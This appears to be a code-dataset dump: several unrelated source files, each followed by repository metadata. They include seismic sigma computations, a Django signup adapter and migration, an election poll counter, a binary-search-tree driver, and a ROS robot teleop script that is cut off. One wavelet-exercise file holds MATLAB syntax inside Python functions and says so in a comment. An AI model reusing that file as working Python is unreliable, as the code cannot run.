            fid.write( '%s %s %s %s %s %s %s %s\n'%(SiteLon1D[irow],SiteLat1D[irow], \
                tmp_sd[0][irow],
                tmp_sd[1][irow],
                tmp_sd[2][irow],
                tmp_sd[3][irow],
                tmp_sd[4][irow],
                tmp_sd[5][irow] ))
        fid.close()
    else:
        sigma_M_ks.append(tmp_vd0)
sigma_M_ks = np.array(sigma_M_ks) # dimension: [Nsid, Nmodel, Nsta ]
# compute the average
pdf_s = np.repeat( 1./sigma_M_ks.shape[2], sigma_M_ks.shape[2] )
sigma_M = np.average( np.average( sigma_M_ks, axis=0, weights = srcPDF ), axis=1, weights = pdf_s )
#print 'sigma_M', mflag, T, rup_model_id, np.sqrt( sigma_M )
# ===================
# Dkxs for sigma_D
# ===================
# Hypocenter (directivity) factor: variance of the D factor over
# hypocenters, using the same beta-distributed hypocenter weights.
print 'Compute sigma_D...'
mapout4 = mapout3 + '/SDksD' # distinguish with SDks (residual sigma)
mapout = mapout4 + '/Sigma%s'%(sigma)
for f in [mapout4, mapout, ]:
    if not os.path.exists( f ):
        os.mkdir(f)
sigma_D_ks = []
for isid in xrange( len(sids) ):
    sid = str(int(sids[isid]))
    AreaTmp = Areas[isid]
    Nh = int(sidhypo[sid])
    # Calculate the hypocenter weighting function (pdf_x)
    xh = (np.arange( Nh )+1.0) / (Nh+1.0)
    spl = sigma.strip().split('_')
    alpha, beta = float(spl[0]), float(spl[1])
    prob0 = stats.beta.pdf(xh,alpha,beta) # use scipy.stats
    pdf_x = (prob0/sum(prob0)).tolist() # to make sure sum(prob) = 1
    tmp_dkxs = []
    for ihypo in xrange( Nh ):
        Dfile = Dpth + '/'+sid+'/'+'CyberShake.NGAs.%s.Source%s.Ih%s.dkxs'%(T,sid,ihypo)
        inputs = np.loadtxt( Dfile )
        lons0 = inputs[:,0]
        lats0 = inputs[:,1]
        d1 = inputs[:,4:10] # CS-CB, CS-BA, CS-CY, CS-AS, CS, CS-Ref
        if Gflag:
            dkxs0 = np.zeros( d1.shape )
            dkxs0 = -( d1[:,:6]-d1[:,4:5] ) # NGA and Ref
            dkxs0[:,4:5] = d1[:,4:5] # CS
        else:
            dkxs0 = d1
        tmp_dkxs.append( dkxs0 )
    tmp_dkxs = np.array( tmp_dkxs )
    # standard deviation and average over hypocenters
    tmp_sd = np.sqrt( np.average( tmp_dkxs**2, axis=0,weights=pdf_x) )
    sigma_D_ks.append( tmp_sd**2 ) # variance
    if sigmaMap:
        pafile = mapout + '/CyberShake.NGAs.%s.Source%s.SdksD'%(T,sid)
        fid = open( pafile, 'w' )
        Nrow = len(SiteLon1D)
        for irow in xrange( Nrow ):
            fid.write( '%s %s %s %s %s %s %s %s\n'%(SiteLon1D[irow],SiteLat1D[irow], \
                tmp_sd[irow, 0],
                tmp_sd[irow, 1],
                tmp_sd[irow, 2],
                tmp_sd[irow, 3],
                tmp_sd[irow, 4],
                tmp_sd[irow, 5],
                ))
        fid.close()
# compute average
sigma_D_ks = np.array(sigma_D_ks)
pdf_s = np.repeat( 1./sigma_D_ks.shape[1], sigma_D_ks.shape[1] )
sigma_D = np.average( np.average( sigma_D_ks, axis=0, weights = srcPDF ), axis=0, weights = pdf_s )
print 'sigma_D', mflag, T, rup_model_id, np.sqrt( sigma_D )
# ==================
# Sigma_C
# ==================
# Source (path) factor: variance of the C factor over sources, weighted
# by the disaggregation-based source pdf.
print 'Compute Sigma_C...'
mapout4 = mapout3 + '/SCs' # distinguish with SDks (residual sigma)
mapout = mapout4 + '/Sigma%s'%(sigma)
for f in [mapout4, mapout, ]:
    if not os.path.exists( f ):
        os.mkdir(f)
tmp_ks = []
for isid in xrange( len(sids) ):
    sid = str(int(sids[isid]))
    AreaTmp = Areas[isid]
    Nh = int(sidhypo[sid])
    Cfile = Cpth + '/CyberShake.NGAs.%s.Source%s.cks'%(T,sid)
    inputs = np.loadtxt( Cfile )
    lons0 = inputs[:,0]
    lats0 = inputs[:,1]
    c1 = inputs[:,5:11] # CS-CB, CS-BA, CS-CY, CS-AS, CS, CS-Ref
    if Gflag:
        cks0 = np.zeros( c1.shape )
        cks0 = -( c1[:,:6]-c1[:,4:5] ) # NGA and Ref
        cks0[:,4:5] = c1[:,4:5] # CS
    else:
        cks0 = c1
    tmp_ks.append( cks0 )
tmp_ks = np.array( tmp_ks )
# standard deviation and average over hypocenters
tmp_sd = np.sqrt( np.average( tmp_ks**2, axis=0, weights=srcPDF) )
sigma_C_s = tmp_sd**2 # variance
if sigmaMap:
    pafile = mapout + '/CyberShake.NGAs.%s.SCs'%T
    fid = open( pafile, 'w' )
    Nrow = len(SiteLon1D)
    for irow in xrange( Nrow ):
        fid.write( '%s %s %s %s %s %s %s %s\n'%(SiteLon1D[irow],SiteLat1D[irow], \
            tmp_sd[irow, 0],
            tmp_sd[irow, 1],
            tmp_sd[irow, 2],
            tmp_sd[irow, 3],
            tmp_sd[irow, 4],
            tmp_sd[irow, 5],
            ))
    fid.close()
# compute average
pdf_s = np.repeat( 1./sigma_C_s.shape[0], sigma_C_s.shape[0] )
sigma_C = np.average( sigma_C_s, axis=0, weights = pdf_s )
print 'sigma_C', mflag, T, rup_model_id, np.sqrt( sigma_C )
# ==================
# Sigma_B
# ==================
# Site (bias) factor: variance of the B factor over sites, uniform weights.
print 'Compute Sigma_B...'
mapout4 = mapout3 + '/SB' # distinguish with SDks (residual sigma)
mapout = mapout4 + '/Sigma%s'%(sigma)
for f in [mapout4, mapout, ]:
    if not os.path.exists( f ):
        os.mkdir(f)
Bfile = Bpth + '/'+'CyberShake.NGAs.%s.bs'%(T)
inputs = np.loadtxt( Bfile )
lons0 = inputs[:,0]
lats0 = inputs[:,1]
b1 = inputs[:,5:11] # CS-CB, CS-BA, CS-CY, CS-AS, CS, CS-Ref
if Gflag:
    bs0 = np.zeros( b1.shape )
    bs0 = -( b1[:,:6]-b1[:,4:5] ) # NGA and Ref
    bs0[:,4:5] = b1[:,4:5] # CS
else:
    bs0 = b1
# standard deviation and average over hypocenters
pdf_s = list(np.repeat(1./bs0.shape[0],bs0.shape[0]))
tmp_sd = np.sqrt( np.average( bs0**2, axis=0, weights=pdf_s ) )
sigma_B = tmp_sd**2
if sigmaMap:
    pafile = mapout + '/CyberShake.NGAs.%s.SbsB'%(T)
    fid = open( pafile, 'w' )
    fid.write( '%s %s %s %s %s %s\n'%( \
        tmp_sd[0],
        tmp_sd[1],
        tmp_sd[2],
        tmp_sd[3],
        tmp_sd[4],
        tmp_sd[5],
        ))
    fid.close()
print 'sigma_B', mflag, T, rup_model_id, np.sqrt( sigma_B )
# write sigmas into file (not varirance, but above are all variance)
# Columns are per-model: CB, BA, CY, AS, CS, Ref.  Variances are summed
# across factors and only converted to sigma (sqrt) when written out.
sfid = open(soutfile,'w')
if Gflag:
    print 'sigma_T(abf)', mflag, T, rup_model_id, np.sqrt( sigma_B+sigma_C+sigma_D+sigma_M+np.array([sigmaT[0], sigmaT[1], sigmaT[2],sigmaT[3],sigmaT[4],sigmaT[5]]))
    sigma_G = sigma_B+sigma_C+sigma_D+sigma_M+np.array([sigmaT[0], sigmaT[1], sigmaT[2],sigmaT[3],sigmaT[4],sigmaT[5]])
    sfid.write('Model, sigma_B, sigma_C, sigma_D, sigma_M, sigma_F, sigma_G\n')
    Var_ABF = np.array([sigma_B, sigma_C, sigma_D, sigma_M, sigma_F, sigma_G]) # each has size (6, but we want 0:5)
else:
    print 'sigma_T(abf)', mflag, T, rup_model_id, np.sqrt( sigma_B+sigma_C+sigma_D+sigma_M+np.array([sigma_F_CS,sigma_F_CS,sigma_F_CS,sigma_F_CS, 0, sigma_F_CS]) )
    sigma_f = np.array([sigma_F_CS,sigma_F_CS,sigma_F_CS,sigma_F_CS, 0, sigma_F_CS]) # NGA has no contribution to residual f variance!!!
    sigma_G = sigma_B+sigma_C+sigma_D+sigma_M+sigma_f
    sfid.write('Model, sigma_b, sigma_c, sigma_d, sigma_m, sigma_f, sigma_g\n')
    Var_ABF = np.array([sigma_B, sigma_C, sigma_D, sigma_M, sigma_f, sigma_G]) # each has size (6, but we want 0:5)
nrow, ncol = Var_ABF.shape
# compute NGArms [3,1,2,0]
NGA_rms = []
for irow in range(nrow):
    sigma_tmp = Var_ABF[irow,:4] # NGAs
    NGA_rms.append(np.sqrt(sum(sigma_tmp)/len(sigma_tmp))) # root mean square
sigma_ABF = np.sqrt(Var_ABF)
# Rows are written in the fixed order AS, BA, CB, CY (icol picks the model).
for icol in [3,1,0,2]:
    sfid.write('%s,%s,%s,%s,%s,%s,%s\n'%(NGAmodel[icol],sigma_ABF[0,icol],sigma_ABF[1,icol],sigma_ABF[2,icol], sigma_ABF[3,icol], sigma_ABF[4,icol], sigma_ABF[5,icol]))
# write out the NGA-rms (for Gflag = 0, this is CS-NGArms)
sfid.write('NGA-rms, %s, %s, %s, %s, %s, %s\n'%(NGA_rms[0],NGA_rms[1],NGA_rms[2],NGA_rms[3],NGA_rms[4],NGA_rms[5]))
# write out CyberShake
icol = 4
sfid.write('%s, %s,%s,%s,%s,%s,%s\n'%(CSmodel, sigma_ABF[0,icol],sigma_ABF[1,icol],sigma_ABF[2,icol], sigma_ABF[3,icol], sigma_ABF[4,icol], sigma_ABF[5,icol]))
sfid.close()
print 'time elapsed: %s'%(time.time()-tic)
| [
"fengo.win@gmail.com"
] | fengo.win@gmail.com |
dd1953d6927d29066068ea81328364dee75a86e6 | bbf1ae079309eca11270422d3f0d259d1515d430 | /numerical-tours/python/todo/solutions/wavelet_2_haar2d.py | 7ec8c89d23ba2108e274a13521844d6ad479f593 | [
"BSD-2-Clause"
] | permissive | ZichaoDi/Di_MATLABTool | 5e6a67b613c4bcf4d904ddc47c2744b4bcea4885 | c071291c63685c236f507b2cb893c0316ab6415c | refs/heads/master | 2021-08-11T07:28:34.286526 | 2021-08-04T18:26:46 | 2021-08-04T18:26:46 | 149,222,333 | 9 | 5 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py | def exo1():
"""
Implement a full wavelet transform that extract iteratively wavelet
coefficients, by repeating these steps. Take care of choosing the
correct number of steps.
"""
Jmin = 0
fw = f
for j in J: -1: Jmin:
fw(1: 2^(j + 1), 1: 2^(j + 1)) = haar(fw(1: 2^(j + 1), 1: 2^(j + 1)))
%
j1 = J-j
if j1 <4
A = fw(1: 2^(j + 1), 1: 2^(j + 1))
imageplot(A(1: 2^j, 2^j + 1: 2^(j + 1)), ['Horizontal, j = ' num2str(j)], 3, 4, j1 + 1)
imageplot(A(2^j + 1: 2^(j + 1), 1: 2^j), ['Vertical, j = ' num2str(j)], 3, 4, j1 + 5)
imageplot(A(2^j + 1: 2^(j + 1), 2^j + 1: 2^(j + 1)), ['Diagonal, j = ' num2str(j)], 3, 4, j1 + 9)
def exo2():
    """
    Write the inverse wavelet transform that computes $f_1$ from
    coefficients |fW|.
    """
    # NOTE(review): the body below is machine-converted MATLAB from the
    # Numerical Tours exercises and is NOT valid Python (MATLAB slice
    # syntax, '%' comments, no 'end'-matched blocks).  Kept verbatim as a
    # template to be ported by hand.
    f1 = fw
    for j in Jmin: J:
        s = 1: 2^j; t = 2^j + 1: 2^(j + 1); u = 1: 2^(j + 1)
        f1(u, u) = ihaar(f1(s, s), f1(s, t), f1(t, s), f1(t, t))
        %
        j1 = J-j
        if j1 >0 & j1 <5
            A = f1(1: 2^(j + 1), 1: 2^(j + 1))
            subplot(2, 2, j1)
            imageplot(A, ['Partial reconstruction, j = ' num2str(j)])
def exo3():
    """
    Display the reconstructed signal obtained from |fw1|, for a decreasing cut-off scale $j$.
    """
    # NOTE(review): machine-converted MATLAB (not valid Python) -- kept
    # verbatim as a porting template; see the note in exo2.
    jlist = J-(1: 4)
    fw = perform_haar_transf(f, 1, + 1)
    for i in 1: length(jlist):
        j = jlist(i)
        fw1 = zeros(n); fw1(1: 2^j, 1: 2^j) = fw(1: 2^j, 1: 2^j)
        f1 = perform_haar_transf(fw1, 1, -1)
        % display
        subplot(2, 2, i)
        imageplot(f1)
        title(strcat(['j = ' num2str(j) ', SNR = ' num2str(snr(f, f1), 3) 'dB']))
def exo4():
    """
    Find the threshold $T$ so that the number of remaining coefficients in
    |fwT| is a fixed number $m$. Use this threshold to compute |fwT| and then display
    the corresponding approximation $f_1$ of $f$. Try for an increasing number $m$ of coeffiients.
    """
    # NOTE(review): machine-converted MATLAB (not valid Python) -- kept
    # verbatim as a porting template; see the note in exo2.
    m_list = round([.005 .01 .05 .1]*N); % number of kept coefficients
    fw = perform_haar_transf(f, 1, + 1)
    for i in 1: length(m_list):
        m = m_list(i)
        % select threshold
        v = sort(abs(fw(: )))
        if v(1) <v(N)
            v = reverse(v)
        T = v(m)
        fwT = fw .* (abs(fw) >= T)
        % inverse
        f1 = perform_haar_transf(fwT, 1, -1)
        % display
        subplot(2, 2, i)
        imageplot(f1)
        title(strcat(['m = ' num2str(m) ', SNR = ' num2str(snr(f, f1), 3) 'dB']))
| [
"wendydi@compute001.mcs.anl.gov"
] | wendydi@compute001.mcs.anl.gov |
49598af4f83adbd580e591b0ad4dfa516b153a77 | 9a7d296bf9350e7ce437b87673753ebbeaee0078 | /server/mors_seo/adapters.py | fb127dc4dd0cb3897b1b1e50cc9e69b1b57fb743 | [] | no_license | wahello/mors | 52e0a2c31db9636066dfb0a6af5cc38712d68c96 | bf0c45364b21e8832c475d464364de3d20ada6a4 | refs/heads/master | 2020-04-28T16:20:37.653870 | 2019-02-02T12:29:00 | 2019-02-02T12:29:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | from allauth.account.adapter import DefaultAccountAdapter
from allauth.account.utils import user_email, user_username, user_field
class UserAdapter(DefaultAccountAdapter):
    """Signup adapter that also stores first/last name and seeds seo_result."""

    def save_user(self, request, user, form, commit=True):
        """Saves a new `User` instance using information provided in the signup form."""
        cleaned = form.cleaned_data
        user_email(user, cleaned.get('email'))
        user_username(user, cleaned.get('username'))
        # Every new account starts with an empty list of SEO results.
        user_field(user, 'seo_result', [])
        # Copy the optional name fields only when they are non-empty.
        for name_field in ('first_name', 'last_name'):
            value = cleaned.get(name_field)
            if value:
                user_field(user, name_field, value)
        if 'password1' in cleaned:
            user.set_password(cleaned['password1'])
        else:
            # No password supplied (e.g. social signup): mark it unusable.
            user.set_unusable_password()
        self.populate_username(request, user)
        if commit:
            user.save()
        return user
| [
"wos.mateusz16@gmail.com"
] | wos.mateusz16@gmail.com |
f8184270f36e3f165d97bbb247f6f0b508fc5810 | ba7d84b4b85be8c3221468527757e264e64616b9 | /tests/hammytest.py | b5f03afc22f1e60ade3aca0eb505d0bf88fd3fe8 | [] | no_license | gomesr/timetracker | c18eb4b6f33e08eadd72971216b16560ef085aa1 | ce57a0791727a3b06e4b167fbeb3cb3e558ff2f1 | refs/heads/master | 2021-01-22T23:58:20.247393 | 2010-12-12T01:16:54 | 2010-12-12T01:16:54 | 1,130,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 675 | py |
import unittest
from trackers.hammy import HamsterTracker
from hamster import client
class HammyTest(unittest.TestCase):
def setUp(self):
self.tracker = HamsterTracker()
def test_create_100_activites(self):
tags = []
ids = []
try:
for i in range(1,100):
ids.append(self.tracker.start("activity-%d" % i,
"",
"some elaborate desciption",
tags))
finally:
# clean up!
for id in ids:
self.tracker.storage.remove_fact(id)
| [
"rodneygomes@gmail.com"
] | rodneygomes@gmail.com |
46589e8d5188e4fd04f3a679ec039f8a771d07c1 | e39c2b92e3ed9c614b9b91a641c0053edb1eb2ee | /Turner6.py | a256a6e2a6c54531be4d7b0ab35231a008b5a790 | [] | no_license | EMajec/Election-Counter | c1c04a07153a9b807d6c53c59bdd16b5cdb2da75 | 4a6220bdf5e4274520531f2233b41dd95b176670 | refs/heads/master | 2021-01-12T09:17:19.250341 | 2016-12-19T00:28:34 | 2016-12-19T00:28:34 | 76,814,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,998 | py | #Ethan Turner
#November 30 2016
#Proposed Points: 14/15 because all pieces of the project are complete except for multiplier (However it is commented in for review just incase)
#This function reads data in the
#data in the poll file and puts it into a 2D list
#which it then returns.
#The parameter is the name of the file with the poll info.
def get_poll_data(polls_filename):
    """Read the poll CSV file into a 2D list and return it.

    The first line of the file is a column-name header and is skipped.
    Each remaining line becomes one row of the result: a list of strings
    obtained by splitting the line on commas.

    polls_filename -- name of the file with the poll info.
    """
    poll_info = []
    # 'with' guarantees the file handle is closed (it previously leaked).
    with open(polls_filename, 'r') as polls_file:
        polls_file.readline()  # header line: just the column names
        for line in polls_file:
            line = line.rstrip('\n')  # drop the trailing newline
            poll_info.append(line.split(','))
    return poll_info
#this function should create a 2D list from the csv file
#given by the state_filename parameter
#return the 2D list that you create here
def get_state_data(state_filename):
    """Read the electoral-votes-per-state CSV into a 2D list and return it.

    The first line is a header and is skipped; every remaining line is
    split on commas, so each row is [state_name, electoral_votes, ...]
    as strings.

    state_filename -- name of the CSV file with electoral votes per state.
    """
    state_info = []
    # 'with' guarantees the file handle is closed (it previously leaked).
    with open(state_filename, 'r') as state_file:
        state_file.readline()  # skip the header row
        for row in state_file:
            row = row.rstrip('\n')  # drop the trailing newline
            state_info.append(row.split(','))
    return state_info
#TODO: you need to fill in the rest of this function
#this function should calculate (and return) the average difference
#between Clinton's and Trump's vote % in the state
#whose name is passed as the state_name parameter (which is just a string)
#The poll_data parameter is the 2D list with all of the poll info in it
def get_avg_diff(state_name, poll_data):
    """Tally the poll votes for one state and report the projected winner.

    Every row of poll_data that contains state_name in any of its columns
    contributes row[2] to Clinton's total and row[3] to Trump's total.

    Returns "Hillary", "Trump", or "VP" (an exact tie, broken by the VP).
    """
    clinton_total = 0
    trump_total = 0
    divider = '-----------------------------------------'
    for row in poll_data:
        # Scan every cell, exactly like the original column-by-column match.
        for cell in row:
            if cell == state_name:
                clinton_total += int(row[2])
                trump_total += int(row[3])
    if clinton_total > trump_total:
        winner = "Hillary"
        print(divider)
        print("Hillary will win", state_name)
    elif clinton_total < trump_total:
        print(divider)
        print("Trump will win", state_name)
        winner = "Trump"
    else:
        # A tie (or no matching polls at all): the vice president decides.
        winner = "VP"
        print("The vice president will decide.")
    print("Hillary:", clinton_total, '| Trump:', trump_total)
    print(divider)
    return winner
#TODO: you need to fill in the rest of this function
def main():
    """Drive the projection: read the data files, tally electoral votes
    state by state via get_avg_diff, and print the projected winner."""
    poll_rows = get_poll_data('president_polls2016.csv')
    state_rows = get_state_data('ev_per_state2016.csv')
    # Electoral-vote totals per candidate; "VP" results count for neither.
    totals = {"Hillary": 0, "Trump": 0}
    for state_row in state_rows:
        winner = get_avg_diff(state_row[0], poll_rows)
        if winner in totals:
            totals[winner] += int(state_row[1])
    hillary_votes = totals["Hillary"]
    trump_votes = totals["Trump"]
    banner = '*******************************************'
    print(banner)
    if hillary_votes > trump_votes:
        print("Hillary will win with", hillary_votes, "votes")
        print("Trump will lose with", trump_votes, "votes")
    else:
        # Ties fall to Trump here, matching the original else branch.
        print("Trump will win with", trump_votes, "votes")
        print("Hillary will lose with", hillary_votes, "votes")
    print(banner)
#TODO: loop through the state_2D_list
#for each state, call get_avg_diff to calculate the average difference
#in the polls for each candidate and total up the number of electoral
#votes you project each candidate to win.
#print out the final results for your prediction
#this function can be used to test the functions individually
#before making them all work together in the final program
#TODO: change this to instead just call main when your main function is ready to be tested
main()
| [
"noreply@github.com"
] | noreply@github.com |
05c5693d3b24a5c3fd147316f1f2cfeaba19014b | 5c39f5ac529e9f292ba0e4965fd684d4c6eefe8a | /migrations/0001_initial.py | 8570a25dfd79013e6c9c3202871e7bdc877c28d4 | [] | no_license | joshianshul2/csv_db | 6d24dec8bdcd8f00115a8729d5036beb47994d0e | e7215002c0a2fb8cadd0d4087b8651b1ec9e30ea | refs/heads/master | 2023-04-21T19:46:56.941399 | 2021-05-11T17:29:38 | 2021-05-11T17:29:38 | 356,846,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,962 | py | # Generated by Django 3.2 on 2021-04-07 05:30
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration (makemigrations, Django 3.2).
    # Creates the AvgMaster, PropertyMaster, StatusMaster and User tables.
    # Do not hand-edit an applied migration -- add a new migration instead.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='AvgMaster',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('county', models.CharField(max_length=255)),
                ('state', models.CharField(max_length=255)),
                ('NetPrAr', models.FloatField(default=0.0)),
                ('Rate', models.FloatField()),
                ('UserPercentage', models.FloatField(default=0.0)),
                ('FinaleValue', models.FloatField(default=0.0)),
                ('accountId', models.BigIntegerField()),
                ('acres', models.FloatField()),
                ('adTargetingCountyId', models.BigIntegerField()),
                ('address', models.CharField(max_length=255)),
                ('baths', models.BigIntegerField()),
                ('beds', models.BigIntegerField()),
                ('brokerCompany', models.CharField(max_length=255)),
                ('brokerName', models.CharField(max_length=255)),
                ('Url', models.URLField(max_length=255)),
                ('city', models.CharField(max_length=255)),
                ('cityID', models.BigIntegerField()),
                ('companyLogoDocumentId', models.BigIntegerField()),
                ('countyId', models.BigIntegerField()),
                ('description', models.TextField(max_length=255)),
                ('hasHouse', models.BooleanField()),
                ('hasVideo', models.BooleanField()),
                ('hasVirtualTour', models.BigIntegerField()),
                ('imageCount', models.BigIntegerField()),
                ('imageAltTextDisplay', models.CharField(max_length=255)),
                ('isHeadlineAd', models.BooleanField()),
                ('lwPropertyId', models.BigIntegerField()),
                ('isALC', models.BigIntegerField()),
                ('latitude', models.FloatField()),
                ('longitude', models.FloatField()),
                ('price', models.FloatField()),
                ('types', models.TextField(max_length=255)),
                ('status', models.CharField(max_length=20)),
                ('status1', models.CharField(max_length=255)),
                ('zip', models.BigIntegerField()),
                ('Descrpt', models.TextField(default='!', max_length=255)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='PropertyMaster',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('accountId', models.BigIntegerField()),
                ('acres', models.FloatField()),
                ('adTargetingCountyId', models.BigIntegerField()),
                ('address', models.CharField(max_length=255)),
                ('baths', models.BigIntegerField()),
                ('beds', models.BigIntegerField()),
                ('brokerCompany', models.CharField(max_length=255)),
                ('brokerName', models.CharField(max_length=255)),
                ('Url', models.URLField(max_length=255)),
                ('city', models.CharField(max_length=255)),
                ('cityID', models.BigIntegerField()),
                ('companyLogoDocumentId', models.BigIntegerField()),
                ('county', models.CharField(max_length=255)),
                ('countyId', models.BigIntegerField()),
                ('description', models.TextField(max_length=255)),
                ('hasHouse', models.BooleanField()),
                ('hasVideo', models.BooleanField()),
                ('hasVirtualTour', models.BigIntegerField()),
                ('imageCount', models.BigIntegerField()),
                ('imageAltTextDisplay', models.CharField(max_length=255)),
                ('isHeadlineAd', models.BooleanField()),
                ('lwPropertyId', models.BigIntegerField()),
                ('isALC', models.BigIntegerField()),
                ('latitude', models.FloatField()),
                ('longitude', models.FloatField()),
                ('price', models.FloatField()),
                ('types', models.TextField(max_length=255)),
                ('state', models.CharField(max_length=255)),
                ('status', models.CharField(max_length=20)),
                ('status1', models.CharField(max_length=255)),
                ('zip', models.BigIntegerField()),
                ('Rate', models.FloatField()),
                ('NetPrAr', models.FloatField(default=0.0)),
                ('Descrpt', models.TextField(default='!', max_length=255)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='StatusMaster',
            fields=[
                ('status', models.IntegerField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=255)),
                ('last_name', models.CharField(max_length=255)),
                ('email', models.CharField(max_length=255)),
                ('password', models.CharField(max_length=255)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
| [
"joshi.anshul2@gmail.com"
] | joshi.anshul2@gmail.com |
74c0ab18df35dff67f6a923901b4a3934b4750a1 | d369c19c36ebef0d9ce77b5bf70e09af32ec27be | /python/LearnPythonTheHardWay/067_ex17_hydrangea.py | 409685d43138439627b1013438869b75c6e205d6 | [] | no_license | sds-coders/codepractice | 9dcf012d1523527015b03b28cc58e936998a47e0 | 7642b2f74e387e8e311c8034e313fae0f68e967d | refs/heads/master | 2020-04-16T10:12:54.505056 | 2019-03-24T13:50:10 | 2019-03-24T13:50:10 | 165,495,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | # -*- coding: utf-8 -*-
from sys import argv
from os.path import exists
script, from_file, to_file = argv
print "%s에서 %s로 복사합니다." % (from_file, to_file)
# 이 두 줄은 한 줄로도 쓸 수 있습니다. 어떻게 할까요?
in_file = open(from_file)
indata = in_file.read()
print "입력 파일은 %d 바이트입니다." % len(indata)
print "출력 파일이 존재하나요? %r" % exists(to_file)
print "준비되었습니다. 계속하려면 리턴 키를, 취소하려면 CTRL-C를 누르세요."
raw_input()
out_file = open(to_file, 'w')
out_file.write(indata)
print "좋습니다. 모두 완료되었습니다."
out_file.close()
in_file.close()
# open(to_file, 'w').write(open(from_file).read())
| [
"shjun4541@hotmail.com"
] | shjun4541@hotmail.com |
0ba3f4e3ea6946c44b606566dfbf9e684624bdcc | 304511ae7300e1e246c86980cfcdbd52b9d5180e | /main.py | f5f5713b9b166aab4bbcde412f6ffd3452dfd2e7 | [] | no_license | ryanbalog/project5 | 0dea169409cb7d538b609fb1974c6184e9b2f122 | 071a507d21906d9fde22d157d22f5868e792b6a3 | refs/heads/master | 2022-12-06T21:15:37.763781 | 2020-08-29T16:42:52 | 2020-08-29T16:42:52 | 291,309,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | '''
Ryan Balog
CS2420
Project 5
'''
from binarysearchtree import BinarySearchTree
VALUES = [21, 26, 30, 9, 4, 14, 28, 18, 15, 10, 2, 3, 7]
REMOVABLES = [21, 9, 4, 18, 15, 7]
def main():
'''Driver for program'''
tree = BinarySearchTree()
for val in VALUES:
tree.add(val)
for item in tree.preorder():
print(item, end=", ")
print("\n")
print(tree)
for item in REMOVABLES:
tree.remove(item)
print(tree)
if __name__ == "__main__":
main()
| [
"ryanbalog3@gmail.com"
] | ryanbalog3@gmail.com |
13efb73b8dd5b05d0a8276930b8f422fc28fab20 | f4db22a9946e270ceb464e8fe80de1cf3130e30c | /chairbot/src/neato_robot/neato_node/nodes/halloween.py | 90ab480f0edd39736c44196be290478393f89387 | [
"MIT"
] | permissive | charisma-lab/chairbot | 6f81d8f6e0943138333b7be2fbeea72675ca4147 | 7fbdd047afd2cda43d27935d905a443d0d820244 | refs/heads/master | 2020-03-29T10:30:44.724934 | 2018-11-24T01:03:01 | 2018-11-24T01:03:01 | 149,808,681 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,509 | py | #!/usr/bin/env python
import roslib; roslib.load_manifest("neato_node")
import rospy
from math import sin,cos
from geometry_msgs.msg import Twist
import time
from std_msgs.msg import UInt16
from sensor_msgs.msg import Joy
from std_msgs.msg import Int8
from neato_driver.neato_driver import Botvac
class NeatoNode:
def __init__(self):
""" Start up connection to the Neato Robot. """
rospy.init_node('teleop04', anonymous=True)
self.port = rospy.get_param('~port1 ', "/dev/ttyACM1")
rospy.loginfo("Using port: %s"%(self.port))
self.robot = Botvac(self.port)
rospy.Subscriber("/joy04", Joy, self.joy_handler, queue_size=10)
rospy.Subscriber("/cbon04", Int8, self.cbon04, queue_size=10)
# rospy.Subscriber('/touches02', Int8, self.touch_handler, queue_size=10)
self.Axess = (-0.0, -0.0, 1.0, -0.0, -0.0, 1.0, -0.0, -0.0)
self.Butt = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
self.SPEED = 0
self.DIST = 20
self.SPEEDSET = 0
self.SPEEDRAMP = 0
self.lastx = 0
self.lasty = 0
self.xramp = 0
self.yramp = 0
self.touch_number = -1
self.touch0 = False
self.touch1 = False
self.touch2 = False
self.touch3 = False
self.touch4 = False
self.touch5 = False
self.touch6 = False
self.touch7 = False
self.touch8 = False
def spin(self):
# main loop of driver
r = rospy.Rate(20)
while not rospy.is_shutdown():
Lft_t = self.Axess[0]
Lft_d = self.Axess[1]
Rgh_t = self.Axess[3]
Rgh_d = self.Axess[4]
AageL = self.Axess[2]
AageR = self.Axess[5]
L_R = self.Axess[6]
F_B = self.Axess[7]
sq = self.Butt[0]
xx = self.Butt[1]
ci = self.Butt[2]
tr = self.Butt[3]
self.SPEED_s = self.Butt[4]
self.SPEED_f = self.Butt[5]
AageL_Button = self.Butt[6]
AageR_Button = self.Butt[7]
share = self.Butt[8]
options = self.Butt[9]
pressL = self.Butt[10]
pressR = self.Butt[11]
power = self.Butt[12]
self.SPEED -= ((AageR-1)*10)
self.SPEED += ((AageL-1)*10)
self.SPEED = int(self.SPEED)
if (self.SPEED<0):
self.SPEED=0
elif (self.SPEED>330):
self.SPEED=330
self.SPEEDSET = self.SPEED
ll = (Lft_d*self.DIST)
rr = (Rgh_t*self.DIST)
if (rr>=0):
x = (-ll - rr)
y = (-ll + rr)
else:
x = (-ll - rr)
y = (-ll + rr)
x=int(x)
y=int(y)
speeddif = abs(self.SPEEDRAMP - self.SPEEDSET)
if (self.SPEEDRAMP<self.SPEEDSET):
self.SPEEDRAMP += (speeddif/20)
else:
self.SPEEDRAMP -= (speeddif/20)
